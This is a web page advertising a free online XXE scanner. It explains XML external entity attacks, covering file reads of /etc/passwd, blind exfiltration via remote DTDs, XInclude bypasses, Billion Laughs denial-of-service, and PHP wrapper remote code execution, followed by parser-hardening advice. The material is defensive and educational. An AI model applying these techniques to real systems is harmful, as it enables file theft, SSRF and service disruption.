Multi-Protocol Detection
Identifies dangerous URI schemes including file://, http://, php://, gopher://, netdoc://, and expect:// commonly used in XXE exploitation chains.
Instantly detect XML External Entity (XXE) injection vulnerabilities, SSRF vectors, entity bombs, blind XXE patterns, and dangerous protocol handlers in your XML — free, with no login required.
Drag & drop your XML file here, or click to browse
Supports .xml, .dtd, .xsd, .svg, .rss — max 500KB
Load Sample Payloads
Analysing XML document…
Checking entity declarations, protocol handlers, and nesting depth
Advanced Detection
Our scanner combines pattern analysis, structural inspection, and parser-level checks to surface XXE risks instantly.
Identifies dangerous URI schemes including file://, http://, php://, gopher://, netdoc://, and expect:// commonly used in XXE exploitation chains.
Detects parameter entities and out-of-band patterns used in blind XXE attacks where data exfiltration occurs via DNS or HTTP callbacks.
Identifies Billion Laughs and other recursive entity expansion patterns that can exhaust server memory and cause denial-of-service.
Flags xi:include namespace declarations — an often-overlooked XXE alternative that bypasses DOCTYPE-level defences entirely.
Surfaces XML-based Server-Side Request Forgery vectors targeting internal cloud metadata endpoints, Redis, Memcached, and SMTP services.
Nine ready-to-test payloads covering file read, SSRF, PHP wrappers, RCE via expect, gopher SSRF, and one safe reference XML.
Runs a libxml2-powered parse check to surface malformed XML errors alongside security findings — a complete picture in one scan.
Download the full scan report as structured JSON for integration with SIEM platforms, bug trackers, or CI/CD pipelines.
Every finding maps to OWASP Top 10 categories and CWE identifiers, making remediation reporting clear for developers and auditors.
How It Works
No account, no setup, no waiting. Paste and scan in seconds.
Paste raw XML, upload a file (.xml, .dtd, .svg, .wsdl), or select a sample payload from the built-in library.
Select Standard, Deep, or OWASP-aligned mode depending on the thoroughness and focus you need.
Findings are grouped by severity with line numbers, matched patterns, CWE references, and actionable remediation guidance.
Download the JSON report, filter by severity, and apply the parser-specific remediation steps provided for your stack.
XML External Entity (XXE) injection ranks among the most impactful and frequently underestimated attack classes in modern web applications. Every time a backend system ingests XML, it relies on a parser to interpret the document's structure — and if that parser is configured to honour entity declarations, an attacker can weaponise the standard to read arbitrary files, forge internal HTTP requests, or crash the server entirely.
The mechanics of an XXE attack are deceptively simple. An attacker embeds a DOCTYPE block containing a custom entity that points to a sensitive resource — most classically file:///etc/passwd on Linux systems or file:///C:/Windows/win.ini on Windows. When the application echoes the parsed value back to the client, the file's contents travel with it. This is in-band XXE, and it remains one of the fastest paths from unauthenticated access to credential theft in enterprise environments.
Blind XXE variants are more sophisticated. Here, the parser resolves an external entity that triggers an HTTP or DNS callback to an attacker-controlled server, exfiltrating data without any response reflection. Parameter entities — prefixed with the % symbol inside DOCTYPE — are a hallmark of blind XXE chains. They allow the construction of multi-stage payloads that first load a remote DTD, which in turn defines secondary entities referencing local files, forwarding their contents over the network.
XML injection through XInclude represents another blind spot. Because XInclude is processed at the application layer rather than the DTD level, parsers that reject DOCTYPE declarations may still resolve xi:include elements, making XInclude a common bypass for naive XXE mitigations. Our scanner explicitly checks for the XInclude namespace alongside traditional entity vectors.
The denial-of-service dimension of XML XXE is often overlooked. The Billion Laughs attack — a chain of self-referential entity definitions — can inflate a 1 KB document into gigabytes of in-memory text, collapsing the parser in milliseconds. With no network access required, this makes it a particularly accessible tool for disrupting publicly exposed XML endpoints such as SOAP APIs, RSS feeds, and XML configuration services.
XXE via PHP wrappers adds further depth. When the php://filter stream wrapper appears in a SYSTEM entity URI, attackers can retrieve base64-encoded file contents — bypassing controls that look for plaintext patterns. The even more severe expect:// wrapper, if the PHP expect extension is installed, turns an XXE finding directly into remote code execution.
From an XXE test and remediation standpoint, the most reliable defence is disabling external entity processing at the parser level. In PHP, calling libxml_disable_entity_loader(true) before any simplexml_load_string() or DOMDocument::loadXML() call prevents the parser from resolving SYSTEM or PUBLIC entities. In Java, setting XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES to false and enabling the http://apache.org/xml/features/disallow-doctype-decl feature on SAX and DOM factories achieves the same result. Python's defusedxml library wraps stdlib parsers with sane defaults. Whichever language stack you use, never pass untrusted XML to a parser that has not been explicitly hardened.
Security vulnerability management in XML-heavy architectures also benefits from a schema-first approach. Pre-validating incoming documents against a fixed, server-side XSD schema ensures the structure matches expectations before any entity expansion can occur. Pairing schema validation with a strict URI allowlist — permitting only approved protocol schemes and hostnames — eliminates the remaining attack surface even when entity processing is inadvertently left enabled.
Use this free XXE vulnerability scanner as the first line of defence in your XML security review. Load a payload, observe the detection logic, and then apply the remediation steps to your own parser configuration. Prevention is always cheaper than breach response.
FAQ
libxml_disable_entity_loader(true) and avoid LIBXML_NOENT. In Java: set XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES = false and enable the disallow-doctype-decl feature. In Python: use the defusedxml library. Additionally, validate XML against a fixed server-side schema, never load schemas from untrusted URIs, and prefer JSON where XML is not strictly required.
SEOWebChecker.com offers 100+ free online tools covering security testing, SEO analysis, converters, DevOps utilities, and AI-powered workflows.
More Tools You Might Find Useful